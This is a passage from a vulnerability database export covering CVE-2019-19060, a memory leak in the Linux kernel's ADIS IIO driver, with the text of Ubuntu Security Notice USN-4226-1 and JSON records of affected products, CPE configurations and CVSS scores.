        "id": "JVNDB-2003-000197"
      },
      {
        "date": "2003-08-27T04:00:00",
        "db": "NVD",
        "id": "CVE-2003-0462"
      },
      {
        "date": "2003-06-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-7290"
      },
      {
        "date": "2009-07-11T22:56:00",
        "db": "BID",
        "id": "8042"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      },
      {
        "date": "2017-10-11T01:29:10.433000",
        "db": "NVD",
        "id": "CVE-2003-0462"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "8042"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  execve Vulnerability that causes a race condition in system calls",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000197"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "competitive condition",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200308-176"
      }
    ],
    "trust": 0.6
  }
}

var-201911-1413
Vulnerability from variot

A memory leak in the adis_update_scan_mode() function in drivers/iio/imu/adis_buffer.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption), aka CID-ab612b1daf41. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-ab612b1daf41 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. ========================================================================= Ubuntu Security Notice USN-4226-1 January 07, 2020

linux, linux-aws, linux-aws-5.0, linux-azure, linux-gcp, linux-gke-5.0, linux-kvm, linux-oem-osp1, linux-oracle, linux-oracle-5.0, linux-raspi2 vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 19.04
  • Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux: Linux kernel - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-azure: Linux kernel for Microsoft Azure Cloud systems - linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems - linux-kvm: Linux kernel for cloud environments - linux-oracle: Linux kernel for Oracle Cloud systems - linux-raspi2: Linux kernel for Raspberry Pi 2 - linux-aws-5.0: Linux kernel for Amazon Web Services (AWS) systems - linux-gke-5.0: Linux kernel for Google Container Engine (GKE) systems - linux-oem-osp1: Linux kernel for OEM processors - linux-oracle-5.0: Linux kernel for Oracle Cloud systems

Details:

Michael Hanselmann discovered that the CIFS implementation in the Linux kernel did not sanitize paths returned by an SMB server. An attacker controlling an SMB server could use this to overwrite arbitrary files. (CVE-2019-10220)

It was discovered that a heap-based buffer overflow existed in the Marvell WiFi-Ex Driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14895, CVE-2019-14901)

It was discovered that a heap-based buffer overflow existed in the Marvell Libertas WLAN Driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14896, CVE-2019-14897)

It was discovered that the Fujitsu ES network device driver for the Linux kernel did not properly check for errors in some situations, leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2019-16231)

It was discovered that the QLogic Fibre Channel driver in the Linux kernel did not properly check for error, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-16233)

Nicolas Waisman discovered that the WiFi driver stack in the Linux kernel did not properly validate SSID lengths. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-17133)

Anthony Steinhauser discovered that the Linux kernel did not properly perform Spectre_RSB mitigations to all processors for PowerPC architecture systems in some situations. A local attacker could use this to expose sensitive information. (CVE-2019-18660)

It was discovered that the Mellanox Technologies Innova driver in the Linux kernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19045)

It was discovered that the VirtualBox guest driver implementation in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19048)

It was discovered that Geschwister Schneider USB CAN interface driver in the Linux kernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19052)

It was discovered that the netlink-based 802.11 configuration interface in the Linux kernel did not deallocate memory in certain error conditions. (CVE-2019-19055)

It was discovered that the ADIS16400 IIO IMU Driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19060)

It was discovered that the Intel OPA Gen1 Infiniband Driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19065)

It was discovered that the AMD Audio CoProcessor Driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19067)

It was discovered that the event tracing subsystem of the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19072)

It was discovered that the Cascoda CA8210 SPI 802.15.4 wireless controller driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19075)

It was discovered that the AMD Display Engine Driver in the Linux kernel did not properly deallocate memory in certain error conditions. A physically proximate attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2019-19524)

It was discovered that the NXP PN533 NFC USB driver in the Linux kernel did not properly free resources after a late probe error, leading to a use- after-free vulnerability. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19526)

It was discovered that the Microchip CAN BUS Analyzer driver in the Linux kernel contained a use-after-free vulnerability on device disconnect. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19529)

It was discovered that multiple USB HID device drivers in the Linux kernel did not properly validate device metadata on attachment, leading to out-of- bounds writes. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19532)

It was discovered that the PEAK-System Technik USB driver in the Linux kernel did not properly sanitize memory before sending it to the device. A physically proximate attacker could use this to expose sensitive information (kernel memory). (CVE-2019-19534)

It was discovered that in some situations the fair scheduler in the Linux kernel did not permit a process to use its full quota time slice. A local attacker could use this to cause a denial of service. (CVE-2019-19922)

It was discovered that the binder IPC implementation in the Linux kernel did not properly perform bounds checking in some situations, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-2214)

Nicolas Waisman discovered that the Chelsio T4/T5 RDMA Driver for the Linux kernel performed DMA from a kernel stack. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-17075)

It was discovered that the DesignWare USB3 controller driver in the Linux kernel did not properly deallocate memory in some error conditions. (CVE-2019-18813)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.04: linux-image-5.0.0-1009-oracle 5.0.0-1009.14 linux-image-5.0.0-1023-aws 5.0.0-1023.26 linux-image-5.0.0-1024-kvm 5.0.0-1024.26 linux-image-5.0.0-1024-raspi2 5.0.0-1024.25 linux-image-5.0.0-1028-azure 5.0.0-1028.30 linux-image-5.0.0-1028-gcp 5.0.0-1028.29 linux-image-5.0.0-38-generic 5.0.0-38.41 linux-image-5.0.0-38-generic-lpae 5.0.0-38.41 linux-image-5.0.0-38-lowlatency 5.0.0-38.41 linux-image-aws 5.0.0.1023.25 linux-image-azure 5.0.0.1028.28 linux-image-gcp 5.0.0.1028.53 linux-image-generic 5.0.0.38.40 linux-image-generic-lpae 5.0.0.38.40 linux-image-gke 5.0.0.1028.53 linux-image-kvm 5.0.0.1024.25 linux-image-lowlatency 5.0.0.38.40 linux-image-oracle 5.0.0.1009.35 linux-image-raspi2 5.0.0.1024.22 linux-image-virtual 5.0.0.38.40

Ubuntu 18.04 LTS: linux-image-5.0.0-1009-oracle 5.0.0-1009.14~18.04.1 linux-image-5.0.0-1023-aws 5.0.0-1023.26~18.04.1 linux-image-5.0.0-1027-gke 5.0.0-1027.28~18.04.1 linux-image-5.0.0-1028-azure 5.0.0-1028.30~18.04.1 linux-image-5.0.0-1033-oem-osp1 5.0.0-1033.38 linux-image-aws-edge 5.0.0.1023.37 linux-image-azure 5.0.0.1028.39 linux-image-gke-5.0 5.0.0.1027.16 linux-image-oem-osp1 5.0.0.1033.37 linux-image-oracle-edge 5.0.0.1009.8

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4226-1 CVE-2019-10220, CVE-2019-14895, CVE-2019-14896, CVE-2019-14897, CVE-2019-14901, CVE-2019-16231, CVE-2019-16233, CVE-2019-17075, CVE-2019-17133, CVE-2019-18660, CVE-2019-18813, CVE-2019-19045, CVE-2019-19048, CVE-2019-19052, CVE-2019-19055, CVE-2019-19060, CVE-2019-19065, CVE-2019-19067, CVE-2019-19072, CVE-2019-19075, CVE-2019-19083, CVE-2019-19524, CVE-2019-19526, CVE-2019-19529, CVE-2019-19532, CVE-2019-19534, CVE-2019-19922, CVE-2019-2214

Package Information: https://launchpad.net/ubuntu/+source/linux/5.0.0-38.41 https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1023.26 https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30 https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1028.29 https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1024.26 https://launchpad.net/ubuntu/+source/linux-oracle/5.0.0-1009.14 https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1024.25 https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1023.26~18.04.1 https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30~18.04.1 https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1027.28~18.04.1 https://launchpad.net/ubuntu/+source/linux-oem-osp1/5.0.0-1033.38 https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1009.14~18.04.1

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1413",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "5.3.9"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.262"
      },
      {
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.1"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.25"
      },
      {
        "model": "aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.3r2"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.1"
      },
      {
        "model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "fas\\/aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.10"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30.5r3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.262"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.5"
      },
      {
        "model": "hci baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "h610s"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.226"
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.82"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.20"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19060"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.262",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.226",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.82",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.3.9",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.262",
                "versionStartIncluding": "3.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire\\,_enterprise_sds_\\\u0026_hci_storage_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:fas\\/aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30.5r3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.3r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:hci_compute_node_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19060"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155529"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "157755"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2019-19060",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19060",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
